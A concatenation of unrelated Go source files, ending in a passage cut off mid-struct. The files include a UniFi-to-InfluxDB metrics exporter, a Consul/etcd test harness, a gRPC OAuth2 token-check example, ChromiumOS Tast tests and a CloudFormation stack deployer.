// It no-ops (returning nil) when the config is missing or disabled,
// otherwise it builds the influx HTTP client and blocks in PollController.
func (u *InfluxUnifi) Run(c poller.Collect) error {
	var err error
	if u.Collector = c; u.Config == nil || u.Disable {
		u.Logf("InfluxDB config missing (or disabled), InfluxDB output disabled!")
		return nil
	}
	u.setConfigDefaults()
	u.influx, err = influx.NewHTTPClient(influx.HTTPConfig{
		Addr: u.URL,
		Username: u.User,
		Password: u.Pass,
		TLSConfig: &tls.Config{InsecureSkipVerify: !u.VerifySSL}, // nolint: gosec
	})
	if err != nil {
		return fmt.Errorf("making client: %w", err)
	}
	// Publish a copy of the config to the webserver with the password
	// redacted to "true"/"false" (set vs. unset).
	fake := *u.Config
	fake.Pass = strconv.FormatBool(fake.Pass != "")
	webserver.UpdateOutput(&webserver.Output{Name: PluginName, Config: fake})
	u.PollController()
	return nil
}
// setConfigDefaults fills unset config values with package defaults,
// resolves "file://" passwords, and normalizes the polling interval
// (defaulted, clamped to the minimum, and rounded to whole seconds).
func (u *InfluxUnifi) setConfigDefaults() {
	if u.URL == "" {
		u.URL = defaultInfluxURL
	}
	if u.User == "" {
		u.User = defaultInfluxUser
	}
	if strings.HasPrefix(u.Pass, "file://") {
		u.Pass = u.getPassFromFile(strings.TrimPrefix(u.Pass, "file://"))
	}
	if u.Pass == "" {
		// NOTE: the empty-password fallback reuses the default username value.
		u.Pass = defaultInfluxUser
	}
	if u.DB == "" {
		u.DB = defaultInfluxDB
	}
	if u.Interval.Duration == 0 {
		u.Interval = cnfg.Duration{Duration: defaultInterval}
	} else if u.Interval.Duration < minimumInterval {
		u.Interval = cnfg.Duration{Duration: minimumInterval}
	}
	u.Interval = cnfg.Duration{Duration: u.Interval.Duration.Round(time.Second)}
}
// getPassFromFile reads the password from filename, trimming whitespace.
// A read error is logged and an empty string is returned (which then
// falls back to the default in setConfigDefaults).
func (u *InfluxUnifi) getPassFromFile(filename string) string {
	b, err := ioutil.ReadFile(filename)
	if err != nil {
		u.LogErrorf("Reading InfluxDB Password File: %v", err)
	}
	return strings.TrimSpace(string(b))
}
// ReportMetrics batches all device and client data into influxdb data points.
// Call this after you've collected all the data you care about.
// Returns an error if influxdb calls fail, otherwise returns a report.
func (u *InfluxUnifi) ReportMetrics(m *poller.Metrics, e *poller.Events) (*Report, error) {
	r := &Report{
		Metrics: m,
		Events: e,
		ch: make(chan *metric),
		Start: time.Now(),
		Counts: &Counts{Val: make(map[item]int)},
	}
	defer close(r.ch)
	var err error
	// Make a new Influx Points Batcher.
	r.bp, err = influx.NewBatchPoints(influx.BatchPointsConfig{Database: u.DB})
	if err != nil {
		return nil, fmt.Errorf("influx.NewBatchPoint: %w", err)
	}
	// collect consumes r.ch in the background while loopPoints produces.
	go u.collect(r, r.ch)
	// Batch all the points.
	u.loopPoints(r)
	r.wg.Wait() // wait for all points to finish batching!
	// Send all the points.
	if err = u.influx.Write(r.bp); err != nil {
		return nil, fmt.Errorf("influxdb.Write(points): %w", err)
	}
	r.Elapsed = time.Since(r.Start)
	return r, nil
}
// collect runs in a go routine and batches all the points.
// Metrics with no timestamp inherit the report's collection time.
func (u *InfluxUnifi) collect(r report, ch chan *metric) {
	for m := range ch {
		if m.TS.IsZero() {
			m.TS = r.metrics().TS
		}
		pt, err := influx.NewPoint(m.Table, m.Tags, m.Fields, m.TS)
		if err == nil {
			r.batch(m, pt)
		}
		// err is recorded (nil or not) and the per-point wait is released.
		r.error(err)
		r.done()
	}
}
// loopPoints walks every metric category (rogue APs, sites, site DPI,
// clients, devices, event logs, client DPI) and sends the resulting
// points to the collect routine through the metric channel.
// NOTE(review): the previous comment claimed this "kicks off 3 or 7 go
// routines"; the visible code runs sequentially on the caller's goroutine.
func (u *InfluxUnifi) loopPoints(r report) {
	m := r.metrics()
	for _, s := range m.RogueAPs {
		u.switchExport(r, s)
	}
	for _, s := range m.Sites {
		u.switchExport(r, s)
	}
	for _, s := range m.SitesDPI {
		u.batchSiteDPI(r, s)
	}
	for _, s := range m.Clients {
		u.switchExport(r, s)
	}
	for _, s := range m.Devices {
		u.switchExport(r, s)
	}
	for _, s := range r.events().Logs {
		u.switchExport(r, s)
	}
	// Client DPI totals are accumulated across all clients, then reported once.
	appTotal := make(totalsDPImap)
	catTotal := make(totalsDPImap)
	for _, s := range m.ClientsDPI {
		u.batchClientDPI(r, s, appTotal, catTotal)
	}
	reportClientDPItotals(r, appTotal, catTotal)
}
// switchExport dispatches a polled value to the batcher matching its
// concrete UniFi type; unknown types are logged as errors.
func (u *InfluxUnifi) switchExport(r report, v interface{}) { //nolint:cyclop
	switch v := v.(type) {
	case *unifi.RogueAP:
		u.batchRogueAP(r, v)
	case *unifi.UAP:
		u.batchUAP(r, v)
	case *unifi.USW:
		u.batchUSW(r, v)
	case *unifi.USG:
		u.batchUSG(r, v)
	case *unifi.UXG:
		u.batchUXG(r, v)
	case *unifi.UDM:
		u.batchUDM(r, v)
	case *unifi.Site:
		u.batchSite(r, v)
	case *unifi.Client:
		u.batchClient(r, v)
	case *unifi.Event:
		u.batchEvent(r, v)
	case *unifi.IDS:
		u.batchIDS(r, v)
	case *unifi.Alarm:
		u.batchAlarms(r, v)
	case *unifi.Anomaly:
		u.batchAnomaly(r, v)
	default:
		u.LogErrorf("invalid export type: %T", v)
	}
}
|
package main
import (
"pika/driver"
"pika/pkg/logger"
"pika/routers"
"github.com/gin-gonic/gin"
)
// main wires up the service: database and redis drivers, logging,
// the gin router, and finally the HTTP listener on :8082.
func main() {
	driver.InitDB()
	driver.InitRedis()
	logger.InitLogger()
	gin.SetMode(gin.ReleaseMode)
	g := gin.New()
	g = routers.Load(g)
	// ginpprof.Wrap(g)
	if err := g.Run(":8082"); err != nil {
		logger.F.Error("service start fail: " + err.Error())
	}
}
|
package v1alpha1
import (
"github.com/openshift-knative/knative-openshift-ingress/pkg/apis"
networkingv1alpha1 "knative.dev/serving/pkg/apis/networking/v1alpha1"
)
// init appends the Knative networking v1alpha1 scheme-builder to the
// operator's aggregate AddToSchemes list so its types can be registered.
func init() {
	apis.AddToSchemes = append(apis.AddToSchemes, networkingv1alpha1.SchemeBuilder.AddToScheme)
}
|
// Package common contains common utilities and suites to be used in other tests
package common
import (
"bytes"
"encoding/json"
"fmt"
"io"
"io/ioutil"
"math/rand"
"net/http"
"os"
"os/exec"
"path/filepath"
"strconv"
"testing"
"time"
"github.com/cerana/cerana/pkg/kv"
_ "github.com/cerana/cerana/pkg/kv/consul" // register consul with pkg/kv
"github.com/pborman/uuid"
"github.com/stretchr/testify/suite"
)
// init seeds math/rand so randomly chosen test ports (see SetupSuite)
// differ between runs.
func init() {
	rand.Seed(time.Now().UnixNano())
}
// ConsulMaker will create an exec.Cmd to run consul with the given
// parameters. It first writes a consul config file (port layout plus a
// short session TTL) into dir, panicking on any marshal/write failure.
func ConsulMaker(port uint16, dir, prefix string) *exec.Cmd {
	cfg := map[string]interface{}{
		"ports": map[string]interface{}{
			"dns":      port + 1,
			"http":     port + 2,
			"rpc":      port + 3,
			"serf_lan": port + 4,
			"serf_wan": port + 5,
			"server":   port + 6,
		},
		"session_ttl_min": "1s",
	}
	raw, err := json.Marshal(cfg)
	if err != nil {
		panic(err)
	}
	if err := ioutil.WriteFile(dir+"/config.json", raw, 0444); err != nil {
		panic(err)
	}
	args := []string{
		"agent",
		"-server",
		"-bootstrap-expect", "1",
		"-config-file", dir + "/config.json",
		"-data-dir", dir,
		"-bind", "127.0.0.1",
		"-http-port", strconv.Itoa(int(port)),
	}
	return exec.Command("consul", args...)
}
// EtcdMaker will create an exec.Cmd to run etcd with the given
// parameters. The client URL uses port and the peer URL uses port+1,
// both on loopback.
func EtcdMaker(port uint16, dir, prefix string) *exec.Cmd {
	client := fmt.Sprintf("http://127.0.0.1:%d", port)
	peer := fmt.Sprintf("http://127.0.0.1:%d", port+1)
	args := []string{
		"-name", prefix,
		"-data-dir", dir,
		"-initial-cluster-state", "new",
		"-initial-cluster-token", prefix,
		"-initial-cluster", prefix + "=" + peer,
		"-initial-advertise-peer-urls", peer,
		"-listen-peer-urls", peer,
		"-listen-client-urls", client,
		"-advertise-client-urls", client,
	}
	return exec.Command("etcd", args...)
}
// Suite sets up a general test suite with setup/teardown.
// KVCmdMaker builds the kv server process (defaults to ConsulMaker);
// KV/KVURL are populated by SetupSuite once the server is reachable.
type Suite struct {
	suite.Suite
	KVDir string
	KVPrefix string
	KVPort uint16
	KVURL string
	KV kv.KV
	KVCmd *exec.Cmd
	KVCmdMaker func(uint16, string, string) *exec.Cmd
	TestPrefix string
}
// SetupSuite runs a new kv instance on a random port and connects a
// client to it, retrying until the server answers a Ping.
func (s *Suite) SetupSuite() {
	if s.TestPrefix == "" {
		s.TestPrefix = "lochness-test"
	}
	s.KVDir, _ = ioutil.TempDir("", s.TestPrefix+"-"+uuid.New())
	if s.KVPort == 0 {
		s.KVPort = uint16(1024 + rand.Intn(65535-1024))
	}
	if s.KVCmdMaker == nil {
		s.KVCmdMaker = ConsulMaker
	}
	s.KVCmd = s.KVCmdMaker(s.KVPort, s.KVDir, s.TestPrefix)
	if testing.Verbose() {
		s.KVCmd.Stdout = os.Stdout
		s.KVCmd.Stderr = os.Stderr
	}
	s.Require().NoError(s.KVCmd.Start())
	time.Sleep(2500 * time.Millisecond) // Wait for test kv to be ready
	s.KVURL = "http://127.0.0.1:" + strconv.Itoa(int(s.KVPort))
	var err error
	for i := 0; i < 10; i++ {
		s.KV, err = kv.New(s.KVURL)
		if err == nil {
			// BUG FIX: previously Ping was attempted only after kv.New had
			// FAILED, which could dereference a nil client. Only ping a
			// successfully created client, and keep retrying otherwise.
			if err = s.KV.Ping(); err == nil {
				break
			}
		}
		time.Sleep(500 * time.Millisecond) // Wait for test kv to be ready
	}
	// Fail the suite cleanly instead of panicking when the kv never came up.
	s.Require().NoError(err)
	s.KVPrefix = "lochness"
}
// SetupTest prepares anything needed per test.
// Currently a no-op; present so embedders inherit a hook they can override.
func (s *Suite) SetupTest() {
}
// TearDownTest cleans the kv instance.
// Recursively deletes everything under the shared prefix between tests.
func (s *Suite) TearDownTest() {
	s.Require().NoError(s.KV.Delete(s.KVPrefix, true))
}
// TearDownSuite stops the kv instance and removes all data.
func (s *Suite) TearDownSuite() {
	// Stop the test kv process
	// Kill must succeed; Wait is then EXPECTED to return the non-nil
	// "signal: killed" error, hence Require().Error.
	s.Require().NoError(s.KVCmd.Process.Kill())
	s.Require().Error(s.KVCmd.Wait())
	// Remove the test kv data directory
	_ = os.RemoveAll(s.KVDir)
}
// PrefixKey generates a kv key using the set prefix
// (i.e. returns KVPrefix joined with key).
func (s *Suite) PrefixKey(key string) string {
	return filepath.Join(s.KVPrefix, key)
}
// DoRequest is a convenience method for making an http request and doing
// basic handling of the response. postBodyStruct (when non-nil) is sent
// as a JSON body; the response body is decoded into respBody only when
// the status code equals expectedRespCode, otherwise it is logged.
func (s *Suite) DoRequest(method, url string, expectedRespCode int, postBodyStruct interface{}, respBody interface{}) *http.Response {
	var postBody io.Reader
	if postBodyStruct != nil {
		bodyBytes, err := json.Marshal(postBodyStruct)
		s.Require().NoError(err)
		postBody = bytes.NewBuffer(bodyBytes)
	}
	req, err := http.NewRequest(method, url, postBody)
	// BUG FIX: the request-construction error was previously discarded.
	s.Require().NoError(err)
	if postBody != nil {
		req.Header.Add("Content-Type", "application/json")
	}
	client := &http.Client{}
	resp, err := client.Do(req)
	// BUG FIX: a failed request left resp nil and panicked on the
	// StatusCode access below; stop the test immediately instead.
	s.Require().NoError(err)
	defer func() { _ = resp.Body.Close() }()
	correctResponse := s.Equal(expectedRespCode, resp.StatusCode)
	body, err := ioutil.ReadAll(resp.Body)
	s.NoError(err)
	if correctResponse {
		s.NoError(json.Unmarshal(body, respBody))
	} else {
		s.T().Log(string(body))
	}
	return resp
}
|
../src0/base_1526__tcpBufMachine__tunnel_local2remote_send.go |
package main
import (
"context"
"crypto/tls"
"google.golang.org/grpc"
"google.golang.org/grpc/codes"
"google.golang.org/grpc/credentials"
"google.golang.org/grpc/metadata"
"google.golang.org/grpc/status"
pb "grpc-up-and-running/examples/security/oauth2/server/ecommerce"
"log"
"net"
"strings"
)
// server implements the generated ProductInfo gRPC service interface
// (AddProduct / GetProduct methods below).
type server struct {}
// Server wiring: listen address, TLS key pair paths, the static bearer
// token accepted by the interceptor, and the auth error sentinels.
var (
	port = ":50051"
	crtFile = "server.crt" // server public certificate.
	keyFile = "server.key" // server private key.
	correctToken = "some-secret-token"
	errMissingMetadata = status.Errorf(codes.InvalidArgument, "missing metadata")
	errInvalidToken = status.Errorf(codes.Unauthenticated, "invalid credentials")
)
// main starts the TLS-secured gRPC server with the token-checking
// unary interceptor installed, and serves until a fatal error.
func main() {
	cert, err := tls.LoadX509KeyPair(crtFile, keyFile)
	if err != nil {
		log.Fatalf("failed to load key pair: %s", err)
	}
	opts := []grpc.ServerOption{
		// Enable TLS for all incoming connections.
		grpc.Creds(credentials.NewServerTLSFromCert(&cert)),
		grpc.UnaryInterceptor(ensureValidToken),
	}
	s := grpc.NewServer(opts...)
	pb.RegisterProductInfoServer(s, &server{})
	lis, err := net.Listen("tcp", port)
	if err != nil {
		log.Fatalf("failed to listen: %v", err)
	}
	if err := s.Serve(lis); err != nil {
		log.Fatalf("failed to serve: %v", err)
	}
}
// This method ensures a valid token exists within a request's metadata.
// - If the token is missing or invalid, the interceptor blocks execution of the handler and returns an error.
// - Otherwise, the interceptor invokes the unary handler.
func ensureValidToken(ctx context.Context, req interface{}, info *grpc.UnaryServerInfo,
	handler grpc.UnaryHandler) (interface{}, error) {
	md, ok := metadata.FromIncomingContext(ctx)
	if !ok {
		return nil, errMissingMetadata
	}
	// The "authorization" metadata key holds the bearer token values.
	if !valid(md["authorization"]) {
		return nil, errInvalidToken
	}
	return handler(ctx, req)
}
// valid reports whether the first authorization metadata value carries
// the expected bearer token.
func valid(authorization []string) bool {
	if len(authorization) == 0 {
		return false
	}
	return strings.TrimPrefix(authorization[0], "Bearer ") == correctToken
}
// AddProduct satisfies the ProductInfo service interface; not yet implemented.
func (s server) AddProduct(context.Context, *pb.Product) (*pb.ProductID, error) {
	panic("implement me")
}
// GetProduct satisfies the ProductInfo service interface; not yet implemented.
func (s server) GetProduct(context.Context, *pb.ProductID) (*pb.Product, error) {
	panic("implement me")
}
// Copyright 2018 The ChromiumOS Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package perf
import (
"context"
"encoding/json"
"io/ioutil"
"os"
"path/filepath"
"reflect"
"testing"
"chromiumos/tast/errors"
"chromiumos/tast/testutil"
)
// loadJSON decodes the JSON file at path into a generic value tree,
// wrapping open/decode failures with the offending path.
func loadJSON(path string) (interface{}, error) {
	f, err := os.Open(path)
	if err != nil {
		return nil, errors.Wrapf(err, "failed opening %s", path)
	}
	defer f.Close()
	var v interface{}
	if err := json.NewDecoder(f).Decode(&v); err != nil {
		return nil, errors.Wrapf(err, "failed decoding %s", path)
	}
	return v, nil
}
// jsonEquals returns nil when the two files parse to deeply-equal JSON
// values, and an error when either fails to load or the values differ.
func jsonEquals(path1, path2 string) error {
	v1, err := loadJSON(path1)
	if err != nil {
		return err
	}
	v2, err := loadJSON(path2)
	if err != nil {
		return err
	}
	if !reflect.DeepEqual(v1, v2) {
		return errors.New("JSON files differ")
	}
	return nil
}
// saveAndCompare saves p into a temp dir and fails the test when the
// resulting results-chart.json differs from the golden file.
func saveAndCompare(t *testing.T, p *Values, goldenPath string) {
	t.Helper()
	td := testutil.TempDir(t)
	defer os.RemoveAll(td)
	if err := p.Save(td); err != nil {
		t.Fatal("Failed saving JSON: ", err)
	}
	path := filepath.Join(td, "results-chart.json")
	if err := jsonEquals(path, goldenPath); err != nil {
		// Include the produced output in the failure for easier debugging.
		data, _ := ioutil.ReadFile(path)
		t.Fatalf("%v; output:\n%s", err, string(data))
	}
}
// TestSetSingle calls Set repeatedly with one value on a single-valued
// metric; the expected result is captured in the golden file.
func TestSetSingle(t *testing.T) {
	metric := Metric{Name: "metric", Unit: "unit", Direction: SmallerIsBetter}
	p := NewValues()
	p.Set(metric, 1)
	p.Set(metric, 2)
	p.Set(metric, 3)
	saveAndCompare(t, p, "testdata/TestSetSingle.json")
}
// TestSetSinglePanic verifies Set panics when given multiple values for a
// metric not marked Multiple.
func TestSetSinglePanic(t *testing.T) {
	metric := Metric{Name: "metric", Unit: "unit", Direction: SmallerIsBetter}
	p := NewValues()
	defer func() {
		if r := recover(); r == nil {
			t.Error("Did not panic")
		}
	}()
	// Set with multiple values panics for single-valued metrics.
	p.Set(metric, 1, 2, 3)
}
// TestSetMultiple calls Set twice on a Multiple metric; the expected
// result is captured in the golden file.
func TestSetMultiple(t *testing.T) {
	metric := Metric{Name: "metric", Unit: "unit", Direction: SmallerIsBetter, Multiple: true}
	p := NewValues()
	p.Set(metric, 1, 2, 3)
	p.Set(metric, 4, 5, 6)
	saveAndCompare(t, p, "testdata/TestSetMultiple.json")
}
// TestMergeValues merges two Values objects into a third and compares the
// combined result against the golden file.
func TestMergeValues(t *testing.T) {
	metric1 := Metric{Name: "metric1", Unit: "unit", Direction: SmallerIsBetter, Multiple: true}
	metric2 := Metric{Name: "metric2", Unit: "unit", Direction: BiggerIsBetter, Multiple: true}
	metric3 := Metric{Name: "metric3", Unit: "unit", Direction: BiggerIsBetter, Multiple: false}
	p1 := NewValues()
	p2 := NewValues()
	p3 := NewValues()
	p1.Set(metric1, 3, 2, 3)
	p2.Set(metric1, 1, 9, 6)
	p2.Set(metric2, 2, 0)
	p3.Set(metric1, 1, 9, 9, 0)
	p3.Set(metric2, 0, 7, 2, 8)
	p3.Set(metric3, 1000)
	p1.Merge(p2, p3)
	saveAndCompare(t, p1, "testdata/TestMergeValues.json")
}
// TestAppendSinglePanic verifies Append panics on a metric not marked Multiple.
func TestAppendSinglePanic(t *testing.T) {
	metric := Metric{Name: "metric", Unit: "unit", Direction: SmallerIsBetter}
	p := NewValues()
	defer func() {
		if r := recover(); r == nil {
			t.Error("Did not panic")
		}
	}()
	// Append panics for single-valued metrics.
	p.Append(metric, 1)
}
// TestAppendMultiple appends values to a Multiple metric across two calls;
// the expected result is captured in the golden file.
func TestAppendMultiple(t *testing.T) {
	metric := Metric{Name: "metric", Unit: "unit", Direction: SmallerIsBetter, Multiple: true}
	p := NewValues()
	p.Append(metric, 1)
	p.Append(metric, 2, 3)
	saveAndCompare(t, p, "testdata/TestAppendMultiple.json")
}
// TestSave saves a mix of single/multiple metrics, including two variants
// of the same metric name, and compares against the golden file.
func TestSave(t *testing.T) {
	var (
		metric1 = Metric{Name: "metric1", Unit: "unit1", Direction: SmallerIsBetter}
		metric2 = Metric{Name: "metric2", Unit: "unit2", Direction: SmallerIsBetter, Multiple: true}
		metric3a = Metric{Name: "metric3", Variant: "a", Unit: "unit3a", Direction: SmallerIsBetter}
		metric3b = Metric{Name: "metric3", Variant: "b", Unit: "unit3b", Direction: BiggerIsBetter}
	)
	p := NewValues()
	p.Set(metric1, 100)
	p.Set(metric2, 200, 201, 202)
	p.Set(metric3a, 300)
	p.Set(metric3b, 310)
	saveAndCompare(t, p, "testdata/TestSave.json")
}
// TestSave_Zero covers edge values: a zero measurement and a Multiple
// metric set with no values at all.
func TestSave_Zero(t *testing.T) {
	var (
		metric1 = Metric{Name: "metric1", Unit: "unit1", Direction: SmallerIsBetter}
		metric2 = Metric{Name: "metric2", Unit: "unit2", Direction: SmallerIsBetter, Multiple: true}
	)
	p := NewValues()
	p.Set(metric1, 0)
	p.Set(metric2)
	saveAndCompare(t, p, "testdata/TestSave_Zero.json")
}
// saveAsAndCompare saves p in the given format into a temp dir and fails
// the test when the produced file differs from the golden file.
func saveAsAndCompare(t *testing.T, p *Values, goldenPath string, format Format, expectedFileName string) {
	t.Helper()
	td := testutil.TempDir(t)
	defer os.RemoveAll(td)
	// Stub out GUID generation for determinism. BUG FIX: restore the
	// original afterwards so the stub does not leak into other tests.
	origGenGUID := runGenGUID
	runGenGUID = func(context.Context) (string, error) { return "FAKE-GUID", nil }
	defer func() { runGenGUID = origGenGUID }()
	if err := p.SaveAs(context.Background(), td, format); err != nil {
		t.Fatal("Failed saving JSON: ", err)
	}
	path := filepath.Join(td, expectedFileName)
	if err := jsonEquals(path, goldenPath); err != nil {
		data, _ := ioutil.ReadFile(path)
		t.Fatalf("%v; output:\n%s", err, string(data))
	}
}
// saveFormat builds a fixed set of metrics and verifies that saving them in
// the given format produces expectedFileName matching the expectedOutput golden file.
func saveFormat(t *testing.T, format Format, expectedOutput, expectedFileName string) {
	// Note: format=Chromeperf does not currently support multiple variants.
	var (
		metric1 = Metric{Name: "metric1", Unit: "unit1", Direction: SmallerIsBetter}
		metric2 = Metric{Name: "metric2", Unit: "unit2", Direction: SmallerIsBetter, Multiple: true}
		metric3 = Metric{Name: "metric3", Unit: "bytes", Direction: BiggerIsBetter}
	)
	p := NewValues()
	p.Set(metric1, 100)
	p.Set(metric2, 200, 201, 202)
	p.Set(metric3, 300)
	saveAsAndCompare(t, p, expectedOutput, format, expectedFileName)
}
// TestSaveAsCrosbolt checks the Crosbolt output format (results-chart.json).
func TestSaveAsCrosbolt(t *testing.T) {
	saveFormat(t, Crosbolt, "testdata/TestSaveAsCrosbolt.json", "results-chart.json")
}
// TestSaveAsChromeperf checks the Chromeperf output format (perf_results.json).
func TestSaveAsChromeperf(t *testing.T) {
	saveFormat(t, Chromeperf, "testdata/TestSaveAsChromeperf.json", "perf_results.json")
}
|
// Copyright 2021 The ChromiumOS Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package scanapp
import (
"context"
"chromiumos/tast/local/bundles/cros/scanapp/scanning"
"chromiumos/tast/local/chrome"
"chromiumos/tast/local/chrome/uiauto/scanapp"
"chromiumos/tast/testing"
)
// init registers the LargePaperScans test with the Tast framework, declaring
// its dependencies, fixture, and the golden image files it compares against.
func init() {
	testing.AddTest(&testing.Test{
		Func:         LargePaperScans,
		LacrosStatus: testing.LacrosVariantUnneeded,
		Desc:         "Tests that the Scan app supports large paper size selection when available from printer",
		Contacts:     []string{"bmgordon@chromium.org", "project-bolton@google.com", "cros-peripherals@google.com"},
		Attr: []string{
			"group:mainline",
			"informational",
			"group:paper-io",
			"paper-io_scanning",
		},
		SoftwareDeps: []string{"virtual_usb_printer", "cups", "chrome"},
		Fixture:      "virtualUsbPrinterModulesLoadedWithChromeLoggedIn",
		// One golden file per paper size exercised by testSetups below.
		Data: []string{
			scanning.SourceImage,
			a3GoldenFile,
			a4GoldenFile,
			b4GoldenFile,
			legalGoldenFile,
			letterGoldenFile,
			tabloidGoldenFile,
		},
	})
}
const (
	// esclCapabilities is the eSCL capabilities description advertising large
	// paper sizes, fed to the virtual USB printer.
	esclCapabilities = "/usr/local/etc/virtual-usb-printer/escl_capabilities_large_paper_sizes.json"
	// Golden scan output images, one per supported page size.
	a3GoldenFile      = "a3_golden_file.png"
	a4GoldenFile      = "a4_golden_file.png"
	b4GoldenFile      = "b4_golden_file.png"
	legalGoldenFile   = "legal_golden_file.png"
	letterGoldenFile  = "letter_golden_file.png"
	tabloidGoldenFile = "tabloid_golden_file.png"
)
// testSetups enumerates one scan-settings/golden-file pair per supported large
// paper size; each entry is run as a subtest by RunAppSettingsTests.
var testSetups = []scanning.TestingStruct{
	{
		Name: "paper_size_a3",
		Settings: scanapp.ScanSettings{
			Source:     scanapp.SourceFlatbed,
			FileType:   scanapp.FileTypePNG,
			ColorMode:  scanapp.ColorModeColor,
			PageSize:   scanapp.PageSizeA3,
			Resolution: scanapp.Resolution300DPI,
		},
		GoldenFile: a3GoldenFile,
	}, {
		Name: "paper_size_a4",
		Settings: scanapp.ScanSettings{
			Source:     scanapp.SourceFlatbed,
			FileType:   scanapp.FileTypePNG,
			ColorMode:  scanapp.ColorModeColor,
			PageSize:   scanapp.PageSizeA4,
			Resolution: scanapp.Resolution300DPI,
		},
		GoldenFile: a4GoldenFile,
	}, {
		Name: "paper_size_b4",
		Settings: scanapp.ScanSettings{
			Source:     scanapp.SourceFlatbed,
			FileType:   scanapp.FileTypePNG,
			ColorMode:  scanapp.ColorModeColor,
			PageSize:   scanapp.PageSizeB4,
			Resolution: scanapp.Resolution300DPI,
		},
		GoldenFile: b4GoldenFile,
	}, {
		Name: "paper_size_legal",
		Settings: scanapp.ScanSettings{
			Source:     scanapp.SourceFlatbed,
			FileType:   scanapp.FileTypePNG,
			ColorMode:  scanapp.ColorModeColor,
			PageSize:   scanapp.PageSizeLegal,
			Resolution: scanapp.Resolution300DPI,
		},
		GoldenFile: legalGoldenFile,
	}, {
		Name: "paper_size_letter",
		Settings: scanapp.ScanSettings{
			Source:     scanapp.SourceFlatbed,
			FileType:   scanapp.FileTypePNG,
			ColorMode:  scanapp.ColorModeColor,
			PageSize:   scanapp.PageSizeLetter,
			Resolution: scanapp.Resolution300DPI,
		},
		GoldenFile: letterGoldenFile,
	}, {
		Name: "paper_size_tabloid",
		Settings: scanapp.ScanSettings{
			Source:     scanapp.SourceFlatbed,
			FileType:   scanapp.FileTypePNG,
			ColorMode:  scanapp.ColorModeColor,
			PageSize:   scanapp.PageSizeTabloid,
			Resolution: scanapp.Resolution300DPI,
		},
		GoldenFile: tabloidGoldenFile,
	},
}
// LargePaperScans runs the Scan app against a virtual USB printer advertising
// large paper sizes and verifies each page-size setting in testSetups.
func LargePaperScans(ctx context.Context, s *testing.State) {
	cr := s.FixtValue().(*chrome.Chrome)
	var scannerParams = scanning.ScannerStruct{
		Descriptors: scanning.Descriptors,
		Attributes:  scanning.Attributes,
		EsclCaps:    esclCapabilities,
	}
	scanning.RunAppSettingsTests(ctx, s, cr, testSetups, scannerParams)
}
|
package stack
import (
"encoding/json"
"fmt"
"github.com/CleverTap/cfstack/internal/pkg/aws/cloudformation"
"github.com/CleverTap/cfstack/internal/pkg/aws/s3"
"github.com/CleverTap/cfstack/internal/pkg/templates"
"github.com/aws/aws-sdk-go/aws/awserr"
"github.com/fatih/color"
"github.com/golang/glog"
"os"
"path/filepath"
"strings"
)
// Statuses reported for a stack diff operation.
const (
	DiffSuccessStatus = "success"
	DiffFailStatus    = "failed"
	DiffUnknownStatus = "unknown"
)
// Stack describes a single CloudFormation stack to create, update, delete, or
// diff, together with the AWS clients used to act on it.
//
// Bug fix: the struct tags were written as `validate:"required",json:"X"`.
// Go struct tags are SPACE-separated key:"value" pairs; with the comma,
// reflect.StructTag could not parse the json key, so the json tags were
// silently ignored. Behavior is otherwise unchanged (the json names match the
// field names, which is also the encoding/json default).
type Stack struct {
	StackName        string                   `validate:"required" json:"StackName"`
	TemplatePath     string                   `validate:"required" json:"TemplatePath"`
	TemplateRootPath string                   `json:"TemplateRootPath"`
	AbsTemplatePath  string                   `json:"AbsTemplatePath"`
	TemplateUrl      string                   `json:"TemplateUrl"`
	Action           string                   `validate:"required" json:"Action"`
	StackPolicy      templates.PolicyDocument `validate:"required" json:"StackPolicy"`
	Region           string                   `json:"Region"`
	UID              string                   `json:"UID,omitempty"`
	Bucket           string                   `json:"Bucket,omitempty"`
	Parameters       map[string]string        `validate:"required" json:"Parameters"`
	DeploymentOrder  int                      `json:"DeploymentOrder"`
	// Changes holds the result of the most recent Diff call.
	Changes *cloudformation.Changes
	// SuppressMessages disables progress output on stdout.
	SuppressMessages bool
	// serverless is set by uploadTemplate when the template is detected as serverless (SAM).
	serverless bool
	RoleArn    string
	Deployer   cloudformation.CloudFormation
	Uploader   s3.S3
}
// SetRegion sets the AWS region the stack operates in.
func (s *Stack) SetRegion(region string) {
	s.Region = region
}
// SetDeploymentOrder sets the position of this stack in the deployment sequence.
func (s *Stack) SetDeploymentOrder(i int) {
	s.DeploymentOrder = i
}
// SetBucket sets the S3 bucket used for template uploads.
func (s *Stack) SetBucket(bucket string) {
	s.Bucket = bucket
}
// SetUuid sets the unique ID used to namespace S3 keys and change-set names.
func (s *Stack) SetUuid(uuid string) {
	s.UID = uuid
}
// getChangeSetName derives a change-set name unique per run (UID) and stack.
func (s *Stack) getChangeSetName() string {
	return fmt.Sprintf("changeset-%s-%s", s.UID, s.StackName)
}
// Deploy uploads the template if no URL is set, validates it, and then
// performs the stack's Action: "DELETE" removes an existing stack, any other
// action creates the stack when absent or updates it when present.
func (s *Stack) Deploy() error {
	if len(s.TemplateUrl) == 0 {
		if err := s.uploadTemplate(); err != nil {
			return err
		}
	}
	if err := s.Deployer.ValidateTemplate(s.TemplateUrl); err != nil {
		return err
	}
	stackExists, err := s.Deployer.StackExists(s.StackName)
	if err != nil {
		return err
	}
	if s.Action == "DELETE" {
		if !stackExists {
			// Bug fix: this message used to be printed unconditionally, i.e.
			// even after a successful delete. It only applies when there is
			// nothing to delete.
			fmt.Printf("There is no stack %s in region %s to delete\n", s.StackName, s.Region)
			return nil
		}
		return s.delete()
	}
	if stackExists {
		return s.update()
	}
	return s.create()
}
// Diff computes the change set between the deployed stack (if any) and the
// local template/parameters, storing the result in s.Changes. The change-set
// type is CREATE when the stack does not exist yet, UPDATE otherwise.
func (s *Stack) Diff() error {
	if len(s.TemplateUrl) == 0 {
		err := s.uploadTemplate()
		if err != nil {
			return err
		}
	}
	err := s.Deployer.ValidateTemplate(s.TemplateUrl)
	if err != nil {
		glog.Warningf("Template validation error for stack %s", s.StackName)
		return err
	}
	var changeSetType string
	stackExists, err := s.Deployer.StackExists(s.StackName)
	if err != nil {
		return err
	}
	if stackExists {
		changeSetType = "UPDATE"
	} else {
		changeSetType = "CREATE"
	}
	stackPolicy, err := json.Marshal(s.StackPolicy)
	if err != nil {
		return err
	}
	getStackChangesOpts := cloudformation.GetStackChangesOpts{
		StackName:     s.StackName,
		TemplateUrl:   s.TemplateUrl,
		StackPolicy:   string(stackPolicy),
